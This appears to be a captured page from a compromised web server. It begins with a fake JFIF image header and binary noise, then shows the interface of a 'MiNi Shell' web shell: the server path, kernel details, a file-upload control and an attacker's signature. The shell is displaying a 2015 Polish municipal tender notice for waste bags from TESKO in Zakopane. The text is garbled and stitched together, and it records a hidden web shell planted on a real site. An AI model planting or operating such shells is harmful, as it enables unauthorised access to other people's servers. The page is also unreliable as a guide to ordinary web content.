JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150817/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150817/210168-N-2015.html

<p class="kh_header"><b>Zakopane: 8-ZP/2015 - Worki - Dostawa worków na odpady wykonanych z tworzyw sztucznych</b><br>
<b>Numer ogłoszenia: 210168 - 2015; data zamieszczenia: 17.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> TESKO Tatrzańska Komunalna Grupa Kapitałowa Spółka z o.o. , ul. Szymony 17a, 34-500 Zakopane, woj. małopolskie, tel. 18 20 25 614, faks 18 20 25 637.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tesko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Komunalna Spółka Prawa Handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> 8-ZP/2015 - Worki - Dostawa worków na odpady wykonanych z tworzyw sztucznych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa zgodnie z zamówieniami, do magazynu Zamawiającego worków na odpady wykonanych z tworzyw sztucznych. 
Ilości i rodzaje worków oraz warunki techniczne, jakie powinny spełniać worki przeznaczone  do selektywnej zbiórki odpadów opakowaniowych oraz na odpady komunalne zmieszane: 1. Worki do koszy ulicznych bez nadruku 700 x1100  120l Kolor czarny - przeźroczyste lub o pełnym wybarwieniu, ilość: min. 140 000,00 max. 160 000,00; 2. Worki do koszy ulicznych bez nadruku 600 x 900 80l 	Kolor czarny -  przeźroczyste lub o pełnym wybarwieniu min. Ilość 25 000,00 max ilość 35 000,00; 3. Worki do koszy ulicznych bez nadruku 900 x 1100  160lKolor czarny - przeźroczyste lub o pełnym wybarwieniu min. Ilość 2 000,00 max. Ilość 4 000,00; 4. Worki z nadrukiem 700 x 1100  komunalne zmieszane 120l Kolor czarny -przeźroczyste lub o pełnym wybarwieniu min ilość 5 000,00 max. Ilość 6 000,00; 5.	Worki z nadrukiem  600 x 800  komunalne zmieszane 60l Kolor czarny -przeźroczyste lub o pełnym wybarwieniu min. Ilość 1 000,00 max. Ilość 2 000,00; 6.Worki do segregacji na papier 700 x 1100  - z nadrukiem  120 l Kolor  niebieski -  przeźroczyste min. Ilość 12 000,00 max. Ilość 17 000,00; 7.Worki do segregacji na plastik, opakowania wielomateriałowe 700 x 1100  - z nadrukiem  120 l Kolor żółty -  przeźroczyste min. Ilość 70 000,00 max. Ilość 90 000,00; 8.Worki do segregacji na szkło 700 x 1100  - z nadrukiem 120 l 	Kolor zielony - przeźroczyste min. Ilość 18 000,00 max. Ilość 23  000,00; 9.	Worki do segregacji na szkło 600  x 800  - z nadrukiem 60 l Kolor zielony - przeźroczyste  min. ilość 9 000,00 max. ilość 12 000,00; 10. Worki na bioodpady 700 x 1100  - z nadrukiem 120 l  Kolor brązowy -przeźroczyste min. ilość 7 000,00 max. ilość 10 000,00; 11. Worki na bioodpady 600 x 800  - z nadrukiem 60 l  Kolor brązowy -przeźroczyste min. Ilość 4 000,00 max. Ilość 6 000,00; 12.	Worki na pozostałe odpady komunalne MOKRE  700x1100 -- z nadrukiem 120 l	Kolor pomarańczowy - przeźroczyste lub o pełnym wybarwieniu min. ilość 20 000,00	max. ilość  30 000,00; 13. Worki do selektywnej zbiórki odpadów SUCHE 700 x 1100  - z nadrukiem 120 l Kolor żółty -  przeźroczyste  min. Ilość 30 000,00 max. ilość 40 000,00; 14. Worki na bioodpady  700 x 1100  - 120 l 	Kolor brązowy -przeźroczyste	min ilość 3 000,00 max. ilość 5 000,00; 15.Worki na popiół   600 x 800 - z nadrukiem 60l 	Kolor ciemno-popielaty - przeźroczyste lub o pełnym wybarwieniu	min. Ilość 3 000,00 max .ilość 5 000,00; 16.Worki na odpady budowlane  600 x 800 - z nadrukiem  60 l Kolor biały -  przeźroczyste lub o pełnym wybarwieniu	 min. Ilość  1 000,00 max. ilość 2 000,00; 17.Worki z nadrukiem 700 x 1100  komunalne zmieszane 120l Kolor czarny -przeźroczyste lub o pełnym wybarwieniu min. ilość 20 000,00 max. ilość 25 000,00;  18.Worki do segregacji na papier 700 x 1100  - z nadrukiem  120 l	Kolor  niebieski -  przeźroczyste min. Ilość  3 000,00 max. ilość 5 000,00; 19.Worki do segregacji na plastik, opakowania wielomateriałowe 700 x 1100  - z nadrukiem  120 l Kolor żółty -  przeźroczyste  min. Ilość 12 000,00 max. ilość 17  000,00; 20.Worki do segregacji na szkło 700 x 1100  - z nadrukiem  120 l Kolor zielony - przeźroczyste min. ilość 3 000,00 max. ilość 5 000,00; 21.	Worki na bioodpady   700 x 1100 -  z nadrukiem 120 l 	Kolor brązowy -przeźroczyste min. Ilość 2 000,00 max. ilość 4 000,00; 22. Worki na bioodpady  600 x 800 -  z nadrukiem 60 l Kolor brązowy -przeźroczyste	min. Ilość 1 000,00 max. ilość 2 000,00; 23. Worki na bioodpady  bez nadruku  8l 	Kolor brązowy -przeźroczyste	min. ilość 500,00 max. ilość 1 000,00; 24.Worki na popiół   600x800 - z nadrukiem 60l Kolor ciemno-popielaty - przeźroczyste lub o pełnym wybarwieniu min. ilość 2 000,00 max. ilość 3 000,00; 25. Worki na odpady budowlane 600x800 - z nadrukiem 60 l Kolor biały - przeźroczyste lub o pełnym wybarwieniu	min.ilość 1 000,00 max.ilość 2 000,00. Worki w poz. 4-25  muszą posiadać: - sznurek do zawiązania worka;- w poz. 4, 5, 10, 11, 14, 17, 21, 22,  nadruk w kolorze białym wykonany zgodnie ze wzorami nadruków na worki zamieszczonymi w załączniku nr 7 do niniejszej specyfikacji
- w poz. 6, 7, 8, 9, 12, 13, 15, 16, 18, 19, 20, 24, 25  nadruk w kolorze czarnym wykonany zgodnie ze wzorami nadruków na worki zamieszczonymi w załączniku nr 7 do niniejszej specyfikacji. Nadruk musi być formatu A3 umieszczony na środku worka.
Uwaga! Zamawiający nie posiada matryc do wykonania nadruku na workach. Wykonawca zobowiązany jest do wykonania matryc, a koszty poniesione z tego tytułu wkalkulować w koszt wykonania worków. Po zakończeniu umowy matryca przechodzi na własność Spółki TESKO. Wykonawca zobowiązany jest dostarczyć worki z zakładkami dla pozycji 1-3 ujętych w tabeli (do koszy ulicznych bez nadruku). Dla pozostałych worków (poz. 4-19) zakładki nie są wymagane, ale dopuszczane. Dostarczone worki muszą być spakowane. Oczekiwana liczba worków w opakowaniu  200 szt. lub na rolce to 25 szt. Miejsce dostawy - TESKO Tatrzańska Komunalna Grupa Kapitałowa Sp. z o.o., 34-500 Zakopane, ul. Szymony 17A (magazyn). Dostawy do magazynu Zamawiającego będą przyjmowane w godzinach 7:00 - 15:00. Dostawy na koszt Wykonawcy. Wykonawcy winni zapoznać się z należytą starannością z treścią dokumentacji przetargowej oraz uzyskać wiarygodne informacje odnośnie warunków i zobowiązań, które w jakikolwiek sposób mogą wpłynąć na wartość, charakter oferty lub realizację zamówienia. Wykonawca gwarantuje realizację przedmiotu zamówienia zgodnie z warunkami określonymi         w specyfikacji.  Wykonawca ponosi wszystkie koszty związane z przygotowaniem i przedłożeniem swojej oferty oraz wszelkich dokumentów z tym związanych. Wykonawca ma obowiązek wyjaśnić z Zamawiającym wszystkie wątpliwości przed złożeniem oferty.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielanie zamówienia uzupełniającego zgodnie z art. 67 ust 1 pkt. 7 o wartości 20 % zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 18.93.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul>

<p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>wypełniony druk oferty przetargowej stanowiący: załącznik nr 1do SIWZ ; formularz cenowy - załącznik nr 1A do SIWZ; potwierdzenie wpłaty wadium; pełnomocnictwo - zgodnie z wymogami pkt. 8.5. SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający informuje, iż przewiduje możliwość zmiany postanowień zawartej umowy w stosunku   do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
1)Zmiany unormowań prawnych powszechnie obowiązujących w szczególności:
a)zmiana urzędowej stawki podatku VAT - Zamawiający dopuszcza możliwość zmniejszenia lub zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT. Strony dokonają odpowiedniej zmiany wynagrodzenia umownego - dotyczy to części wynagrodzenia za usługi, których w dniu zmiany stawki podatku VAT jeszcze nie wykonano.
b)	wprowadzenie w życie po dniu podpisania umowy regulacji prawnych wywołujących potrzebę zmiany umowy.
2) Przewiduje się zmiany postanowień umowy, jeżeli zmiany te będą korzystne dla Zamawiającego lub konieczność wprowadzenia zmian będzie wynikać z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, w szczególności:
a)	terminu realizacji przedmiotu zamówienia, przy czym zmiana ta spowodowana może być jedynie okolicznościami niezależnymi zarówno od Zamawiającego                                            jak i od Wykonawcy,
b)	oznaczenia danych dotyczących Zamawiającego i/lub Wykonawcy,
c)	innych zmian, których nie można było przewidzieć w chwili zawarcia umowy                                               i mających charakter zmian nieistotnych tj. nie odnoszących się do warunków, które gdyby zostały ujęte w ramach pierwotnej procedury udzielenia zamówienia, umożliwiłyby dopuszczenie innej oferty niż ta, która została pierwotnie dopuszczona.
3) Przewidziane powyżej okoliczności stanowiące podstawę zmian do umowy, stanowią uprawnienie Zamawiającego nie zaś jego obowiązek wprowadzenia takich zmian.
4)	Nie stanowi zmiany umowy w rozumieniu  art. 144 ustawy Prawo zamówień publicznych:
a)	sukcesja Wykonawcy tj. nabycie wszelkich praw i obowiązków w związku                                        z następstwem prawnym,
b)	zmiana danych związanych z obsługą administracyjno-organizacyjną Umowy,
c)	zmiany danych teleadresowych,
d)	zmiany osób wskazanych do kontaktów między Stronami.
e)	Wszelkie zmiany muszą być dokonywane z zachowaniem przepisów ustawy Prawo zamówień publicznych tj.  art.140 ust. 3 stanowiącego, że umowa podlega unieważnieniu w części wykraczającej poza określenie przedmiotu zamówienia zawartego w Specyfikacji Istotnych Warunków Zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.tesko.pll<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> TESKO Tatrzańska Komunalna Grupa Kapitałowa Sp. z.o.o. 
ul. Szymony 17 a 
34-500 Zakopane
- Dział Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.08.2015 godzina 11:00, miejsce: TESKO Tatrzańska Komunalna Grupa Kapitałowa Sp. z.o.o. 
ul. Szymony 17 a 
34-500 Zakopane
- Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com